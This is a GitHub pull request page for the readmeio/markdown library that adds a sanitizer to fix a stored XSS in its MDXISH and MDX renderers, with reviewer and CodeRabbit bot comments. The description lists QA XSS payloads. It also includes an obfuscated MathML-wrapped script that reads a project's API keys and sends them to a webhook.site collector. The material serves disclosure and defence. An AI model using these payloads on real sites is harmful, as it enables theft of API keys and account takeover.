fix: sanitize raw HTML in MDXISH & MDX renderers by eaglethrost · Pull Request #1526 · readmeio/markdown

eaglethrost · 2026-06-26T09:46:28Z

🎫 Resolve RM-17024

🎯 What does this PR do?

Context

The was a reported vulnerability where a stored XSS in the hub docs renderer lets a non-owner put raw HTML in a guide body that runs JS in any viewer's session (incl. the owner's). From there an attacker reads same-origin endpoints (…/apikeys, …/projects/me) and exfiltrates the live API key + custom_login.jwt_secret → project takeover. Reported payload: <math><mtext><script>…</script></mtext></math>.

Root cause: raw HTML was never sanitized on the new engines:

mdxish runs rehypeRaw (raw HTML → real elements) with no sanitizer after it.
MDX compile only sanitizes when format === 'md'; main docs render in the default MDX format, which was not sanitized.
The legacy / md path was already protected by rehype-sanitize.

Correction to the report: it assumed bare <script> was already stripped and only MathML bypassed it. On mdxish & MDX (without non md format) nothing is stripped, bare <script>, <img onerror>, and javascript: all execute; the MathML wrapper isn't required (verified against the pipeline). So a MathML-only patch would've been insufficient.

Fix

Sanitize the rendered content in the AST level. Created an AST-level stripper shared by both the mdxish and MDX compile pipelines:

Removes script/foreign-content/resource-loading host elements
Strips on* handlers and javascript:/vbscript:/executable-data: URLs (incl. whitespace/control-char obfuscation).
Handles both node shapes: hast element (mdxish/md) and MDX JSX (mdxJsxFlowElement/mdxJsxTextElement).
Leaves PascalCase components untouched (their on*/url values are React props) but recurses through them so nested raw HTML is still cleaned.

Considerations & decisions

Denylist, not allowlist hast-util-sanitize (the md path) is allowlist-based and would strip every custom component + prop — which is why it's md-only. mdxish/MDX trees have first-class component nodes, so a denylist that preserves them is the fit. Trade-off: a denylist can miss a novel vector (see CSP below).
Why not use other libraries like DOMPurify It sanitizes HTML strings/DOM, not our AST: would mean a lossy serialize→reparse, strip all MDX components, can't see MDX JSX nodes, and needs jsdom on the server render path.

Note

This sanitisation is not applied to HTMLBlocks since it's for more deliberate HTML execution. For MDXISH & MDX, by default scripts are stripped anyway

What no longer works (intended)

This affects ffects mdxish/MDX docs with hand-authored raw HTML (all already blocked on md/legacy): inline <style>, raw <iframe> (use the Embed component), inline <svg>/<math>,<object>/<link>/<meta>/<base>, inline on* handlers, javascript: URLs. If an MDXISH or MDX uses those HTML in their doc, it will no longer work!

To discuss

Soften iframe/svg? Currently removed wholesale (parity with md), all stripped of tags are in the DANGEROUS_TAG_NAMES list in dangerous-html.ts. We definitely want to strip script & math tags, but for the others I'm not sure if we want to
CSP on hub doc pages (readme repo): The report mentions updating CSP, but that's not in scope of this work. I believe this PR would already block script execution so we don't necessarily need that change, but good to have
Still-open (out of scope): component dangerouslySetInnerHTML sinks (HTMLBlock)

🧪 QA tips

End-to-end in the readme app

Locally link this branch to readme

mdxish guide: paste the sample below → ✅ no alert, no apikeys/network request, no frames/SVG, page styling unaffected; the control block (bold/links/code/div/callout) renders.
MDX doc (default format, not md): same content (note the <style>{ } block hits a pre-existing MDX compile error from CSS braces — use the @import variant, or test <style> alone) → same result.
Non-breakage: existing <Callout>/<Tabs>/<Image>/<Embed>/[block:embed], table alignment, inline style=/class=, normal markdown all render unchanged.

Sample doc content

# Sanitizer QA

<script>alert(document.domain)</script>

<img src="x" onerror="alert(document.domain)" />

<a href="javascript:alert(document.domain)">click</a>

<math><mtext><script>alert(document.domain)</script></mtext></math>

<svg><script>alert(document.domain)</script></svg>

<svg width="200" height="40"><a xlink:href="javascript:alert(document.domain)"><text x="10" y="25">svg link</text></a></svg>

<iframe src="javascript:alert(document.domain)"></iframe>

<style>* { color: red !important; }</style>

<style>@import "https://example.com/deface.css"</style>

<!-- controls that SHOULD still render -->
**bold**, [normal link](https://example.com), `code`

<div class="note" style="border:1px solid #888">plain div, kept</div>

> 📘 callout, kept

After the fix every block above is inert; only the bold / link / code / div / callout controls render.

How to Replicate the Vulnerability in the report:

Go to a doc in an MDXISH and MDX project
Paste a content of this form

<math><mtext><script>fetch(String.fromCharCode(47,116,101,115,116,105,110,103,45,112,99,121,113,47,97,112,105,45,110,101,120,116,47,118,50,47,112,114,111,106,101,99,116,115,47,116,101,115,116,105,110,103,45,112,99,121,113,47,97,112,105,107,101,121,115)).then(function(r){return r.text()}).then(function(t){new Image().src=String.fromCharCode(104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,115,105,116,101,47,55,102,97,55,52,51,101,57,45,52,52,97,100,45,52,98,51,97,45,57,54,54,54,45,48,57,50,56,51,51,48,99,49,50,56,51,47,75,69,89,83,63,100,61)+encodeURIComponent(t)})</script></mtext></math>

1st String.fromCharCode(...) decodes to //api-next/v2/projects//apikeys — the API-keys endpoint, reachable same-origin on the hub.
2nd String.fromCharCode(...) decodes to the attacker's collector URL. I used an online web hook generator in web hook.site, use that URL and convert it to char codes

Open the web hook site & track requests coming in
View the page, refresh several times. You should notice requests coming in, containing the project keys
The network tab will show a network call to apikeys

This is what it would look like in the app:

Screen.Recording.2026-06-26.at.10.44.54.pm.mov

📸 Screenshot or Loom

Before
In this demo, notice how in MDXISH & MDX, scripts, iframes, and svg, get exectued on View

Screen.Recording.2026-06-26.at.8.07.06.pm.mov

After
None of those top level tags execute

Screen.Recording.2026-06-26.at.8.08.11.pm.mov

eaglethrost · 2026-06-26T13:33:13Z


-  // TODO: Skipped about the mdxish engine fails this test since it wraps the <pre> in a <p> tag
-  // Rendering looks correct, so skip this for now until we decide if we want to fix this or not
-  it.skip.each(renderingEngines)('%s: renders the html in a `<pre>` tag if safeMode={true}', (_label, renderContent) => {


This is now resolved

eaglethrost · 2026-06-26T13:34:50Z

+ * load remote resources, or open a foreign-content (MathML/SVG) parsing context
+ * that lets `<script>` survive namespace-confusion bypasses.
+ */
+const DANGEROUS_TAG_NAMES = new Set([


From research, it seems that these tags are the main dangerous tags that might expose XSS vulnerability. It's quite extensive.

If we've got object and applet should we also have embed?

Yeah good point!

Wait sorry actually legacy magic block embeds translates to raw embeds, so I don't think we can strip it, at least for mdxish 😢 . Might worth transforming them to our Embed component, but need to ensure the previous rendering logic is retained.

eaglethrost · 2026-06-26T13:35:17Z

+
+// PascalCase names are custom React components (e.g. `<Callout>`), not host
+// elements; their `on*`/url-like values are component props, not DOM handlers.
+const isComponentName = (name: string): boolean => /^[A-Z]/.test(name);


The main thing to be careful is that we don't sanitise custom MDX components accidentally.

eaglethrost · 2026-06-26T13:36:01Z

      },
    ]);
    rehypePlugins.push([rehypeSanitize, sanitizeSchema]);
+  } else {


Seems like the main MDX path has never sanitise these scripts. They don't get executed during compilation, but later during execution.

kevinports

RE:

Soften iframe/svg? Currently removed wholesale (parity with md), all stripped of tags are in the DANGEROUS_TAG_NAMES list in dangerous-html.ts. We definitely want to strip script & math tags, but for the others I'm not sure if we want to

I'm inclined to allow SVG here because it's a common image format people inline in an html doc. I think we'd still have attribute-level sanitization which should cover our bases there?

It seems like for iframe we could strip them and tell folks to use the Embed block for this right?

kevinports · 2026-06-29T15:22:04Z

+ * load remote resources, or open a foreign-content (MathML/SVG) parsing context
+ * that lets `<script>` survive namespace-confusion bypasses.
+ */
+const DANGEROUS_TAG_NAMES = new Set([


If we've got object and applet should we also have embed?

kevinports · 2026-06-29T15:26:09Z

+
+  if (isMdxJsxElement(node) && node.attributes) {
+    node.attributes = node.attributes.filter(attr => {
+      if (attr.type !== 'mdxJsxAttribute' || typeof attr.name !== 'string') return true; // keep `{...spread}`


I don't follow this "// keep {...spread}" comment.

Does this mean a spread like {...{onclick: 'alert(1)'} will survive sanitization?

Yes it will since we don't sanitise expressions yet, this PR is for top level script tags & attribute / properties sanitisation. We can extend it to expressions, but would need to be careful to not accidentally strip legit content in them.

kevinports · 2026-06-29T15:30:24Z

This plugin factory could probably just live at the bottom of dangerous-html.ts instead of a separate file for this wrapper.

kevinports · 2026-06-29T15:31:18Z

Should there be some unit tests that cover this function directly?

Yep good point!

coderabbitai · 2026-06-30T07:38:20Z

No actionable comments were generated in the recent review. 🎉

ℹ️ Recent review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 8780ac8a-4e8e-4e88-be90-cc824baa508b

📥 Commits

Reviewing files that changed from the base of the PR and between 26e7f0f and 1b2b2c9.

📒 Files selected for processing (1)

lib/compile.ts

🔗 Linked repositories identified

CodeRabbit considers these linked repositories for cross-repo context during reviews:

readmeio/ai (manual)
readmeio/gitto (manual)
readmeio/markdown (manual)
readmeio/readme (manual) → reviewed against branch dimas/rm-17024-stored-xss-in-hub-docs-renderer-via-mathml instead of the default branch

🚧 Files skipped from review as they are similar to previous changes (1)

lib/compile.ts

Walkthrough

This PR adds a rehype plugin, stripDangerousHtml, that removes dangerous HTML elements and unsafe attributes from HAST and MDX JSX trees. It is wired into the compile path for non-md formats and into mdxish after rehypeRaw. The compile pipeline also now merges caller-provided remark/rehype plugins explicitly. New tests cover the plugin directly, both sanitization pipelines, and the previously skipped HTMLBlock safeMode case.

Changes

Related issues: None provided.
Related PRs: None provided.
Suggested labels: security, tests
Suggested reviewers: None provided.

Sequence Diagram(s)

sequenceDiagram
  participant compile as compile()
  participant mdxish as mdxish()
  participant plugin as rehypeStripDangerousHtml
  participant tree as HAST/MDX tree

  compile->>plugin: add to non-md rehypePlugins
  mdxish->>plugin: run after rehypeRaw
  plugin->>tree: visit nodes
  plugin->>tree: remove dangerous elements and attributes
  plugin-->>compile: sanitized output
  plugin-->>mdxish: sanitized output

Poem
Safe tags remain; unsafe tags fall.

_{Comment @coderabbitai help to get the list of available commands.}

coderabbitai

Actionable comments posted: 3

🧹 Nitpick comments (2)

__tests__/lib/compile-sanitize.test.tsx (1)
29-32: 🔒 Security & Privacy | 🔵 Trivial | ⚡ Quick win

Add explicit vbscript: and dangerous data: payloads here.

The current fixture only feeds javascript: into execute(), so a regression on the other blocked schemes would still pass. Add concrete inputs for those schemes to lock in the full URL-sanitization contract.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@__tests__/lib/compile-sanitize.test.tsx` around lines 29 - 32, The
compile-sanitize test only exercises the javascript: case, so it does not
protect the full URL-sanitization contract. Update the test in
compile-sanitize.test.tsx around the execute() fixture to include explicit
vbscript: and dangerous data: payload inputs alongside the existing javascript:
case, and keep the href assertions in the same test so it verifies all blocked
schemes remain non-executable.
__tests__/processor/plugin/dangerous-html.test.ts (1)
124-134: 🔒 Security & Privacy | 🔵 Trivial | ⚡ Quick win

Add a regression for expression-valued URL attributes.

The MDX JSX tests only cover string URL values. Add a host-element case where href or formAction is an expression node resolving to a dangerous scheme, matching the sanitizer gap above.
🤖 Prompt for AI Agents
Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

In `@__tests__/processor/plugin/dangerous-html.test.ts` around lines 124 - 134,
The MDX JSX dangerous-attribute tests only cover string-valued URL props, so add
a regression in dangerous-html.test.ts for host JSX elements whose href or
formAction is an expression node resolving to a javascript: (or other dangerous)
URL. Update the MDX JSX section alongside the existing jsx() /
stripDangerousHtml(root(node)) case to assert that expression-valued URL
attributes are also removed while safe attributes like id remain.

🤖 Prompt for all review comments with AI agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@__tests__/lib/mdxish/sanitize-raw-html.test.ts`:
- Around line 109-118: The test around mdxish sanitization is over-preserving
dangerous URL props on PascalCase components. Update the behavior in the mdxish
sanitize path and the corresponding expectation in sanitize-raw-html.test.ts so
custom components like TestComponent still keep safe props such as onClick but
do not retain javascript: values on href/src-style URL props unless they are
explicitly allowlisted. Use the existing mdxish and findElementByTagName test
setup to verify the dangerous prop is stripped or blocked instead of locked in.

In `@lib/compile.ts`:
- Around line 83-87: The `compile` path currently lets `...opts` override
`rehypePlugins`, which can drop `rehypeStripDangerousHtml` from the MDX
pipeline. Update the `compile` function so caller options are merged before the
explicit plugin list, or otherwise ensure user-supplied `rehypePlugins` are
appended while `rehypeStripDangerousHtml` is always added last. Use the
`compile` function and the `rehypePlugins`/`rehypeStripDangerousHtml` symbols to
locate the fix.

In `@processor/plugin/dangerous-html.ts`:
- Around line 129-134: The MDX attribute sanitizer in dangerous-html.ts only
rejects dangerous URL values when they are strings, so host elements can still
receive non-string URL props like href expressions. Update the filter inside the
node.attributes processing to treat any URL-bearing attribute on host MDX
elements as unsafe unless it is a clearly safe string literal, using the
existing helpers isUrlAttribute and isDangerousUrl in the attr.name/attr.value
check.

---

Nitpick comments:
In `@__tests__/lib/compile-sanitize.test.tsx`:
- Around line 29-32: The compile-sanitize test only exercises the javascript:
case, so it does not protect the full URL-sanitization contract. Update the test
in compile-sanitize.test.tsx around the execute() fixture to include explicit
vbscript: and dangerous data: payload inputs alongside the existing javascript:
case, and keep the href assertions in the same test so it verifies all blocked
schemes remain non-executable.

In `@__tests__/processor/plugin/dangerous-html.test.ts`:
- Around line 124-134: The MDX JSX dangerous-attribute tests only cover
string-valued URL props, so add a regression in dangerous-html.test.ts for host
JSX elements whose href or formAction is an expression node resolving to a
javascript: (or other dangerous) URL. Update the MDX JSX section alongside the
existing jsx() / stripDangerousHtml(root(node)) case to assert that
expression-valued URL attributes are also removed while safe attributes like id
remain.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

Push a commit to this branch (recommended)
Create a new PR with the fixes

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: 73d07070-afbb-4a74-8810-65b56e65c59c

📥 Commits

Reviewing files that changed from the base of the PR and between d94d9ff and 31035c3.

📒 Files selected for processing (8)

__tests__/components/HTMLBlock.test.tsx
__tests__/lib/compile-sanitize.test.tsx
__tests__/lib/mdxish/sanitize-raw-html.test.ts
__tests__/processor/plugin/dangerous-html.test.ts
lib/compile.ts
lib/mdxish.ts
package.json
processor/plugin/dangerous-html.ts

🔗 Linked repositories identified

CodeRabbit considers these linked repositories for cross-repo context during reviews:

readmeio/ai (manual)
readmeio/gitto (manual)
readmeio/markdown (manual)
readmeio/readme (manual) → reviewed against branch dimas/rm-17024-stored-xss-in-hub-docs-renderer-via-mathml instead of the default branch

…er-via-mathml

coderabbitai

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents

Verify each finding against current code. Fix only still-valid issues, skip the
rest with a brief reason, keep changes minimal, and validate.

Inline comments:
In `@lib/compile.ts`:
- Around line 70-75: The remark plugin merge order in compile() is wrong because
userRemarkPlugins are added before tailwindTransformer, allowing caller plugins
to run on the pre-Tailwind AST. Update the plugin assembly in lib/compile.ts so
tailwindTransformer is inserted before appending userRemarkPlugins, keeping the
intended order in the remarkPlugins array.

🪄 Autofix (Beta)

Fix all unresolved CodeRabbit comments on this PR:

Push a commit to this branch (recommended)
Create a new PR with the fixes

ℹ️ Review info

⚙️ Run configuration

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro Plus

Run ID: ffde9a6f-f2b9-4853-ac63-b6a29a8a2476

📥 Commits

Reviewing files that changed from the base of the PR and between 31035c3 and 26e7f0f.

📒 Files selected for processing (5)

__tests__/lib/compile-sanitize.test.tsx
__tests__/lib/mdxish/sanitize-raw-html.test.ts
__tests__/processor/plugin/dangerous-html.test.ts
lib/compile.ts
processor/plugin/dangerous-html.ts

🔗 Linked repositories identified

CodeRabbit considers these linked repositories for cross-repo context during reviews:

readmeio/ai (manual)
readmeio/gitto (manual)
readmeio/markdown (manual)
readmeio/readme (manual) → reviewed against branch dimas/rm-17024-stored-xss-in-hub-docs-renderer-via-mathml instead of the default branch

✅ Files skipped from review due to trivial changes (1)

tests/lib/mdxish/sanitize-raw-html.test.ts

🚧 Files skipped from review as they are similar to previous changes (3)

tests/lib/compile-sanitize.test.tsx
tests/processor/plugin/dangerous-html.test.ts
processor/plugin/dangerous-html.ts

feat: sanitize mdxish & mdx

15b76ac

github-advanced-security AI found potential problems Jun 26, 2026

View reviewed changes

Comment thread __tests__/lib/compile-sanitize.test.tsx Fixed

fix: github test

c2d6449

eaglethrost changed the title ~~fix: sanitize raw HTML in mdxish & MDX renderers (stored XSS)~~ fix: sanitize raw HTML in MDXISH & MDX renderers Jun 26, 2026

eaglethrost requested a review from a team June 26, 2026 13:03

fix: tests, remove style

d771030

eaglethrost commented Jun 26, 2026

View reviewed changes

eaglethrost added 2 commits June 29, 2026 12:26

test: enhance

f3957e3

chore: improvements

053eb40

kevinports reviewed Jun 29, 2026

View reviewed changes

fix: tests & code structure comments

31035c3

coderabbitai Bot requested changes Jun 30, 2026

View reviewed changes

Comment thread __tests__/lib/mdxish/sanitize-raw-html.test.ts Outdated

Comment thread lib/compile.ts

Comment thread processor/plugin/dangerous-html.ts

eaglethrost added 3 commits July 1, 2026 16:34

chore: coderabbit comments

df6d12e

Merge branch 'next' into dimas/rm-17024-stored-xss-in-hub-docs-render…

1c9ef15

…er-via-mathml

fix: remove embed

26e7f0f

coderabbitai Bot requested changes Jul 1, 2026

View reviewed changes

Comment thread lib/compile.ts Outdated

fix: move remark plugins

1b2b2c9

coderabbitai Bot approved these changes Jul 1, 2026

View reviewed changes

Uh oh!

Conversation

eaglethrost commented Jun 26, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

🎯 What does this PR do?

Context

Fix

Considerations & decisions

What no longer works (intended)

To discuss

🧪 QA tips

End-to-end in the readme app

How to Replicate the Vulnerability in the report:

📸 Screenshot or Loom

Uh oh!

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

eaglethrost Jun 30, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Uh oh!

eaglethrost Jul 1, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

kevinports left a comment

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

Choose a reason for hiding this comment

Uh oh!

coderabbitai Bot commented Jun 30, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Walkthrough

Changes

Sequence Diagram(s)

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Uh oh!

Uh oh!

coderabbitai Bot left a comment

Choose a reason for hiding this comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants

eaglethrost commented Jun 26, 2026 •

edited

Loading

eaglethrost Jun 30, 2026 •

edited

Loading

eaglethrost Jul 1, 2026 •

edited

Loading

coderabbitai Bot commented Jun 30, 2026 •

edited

Loading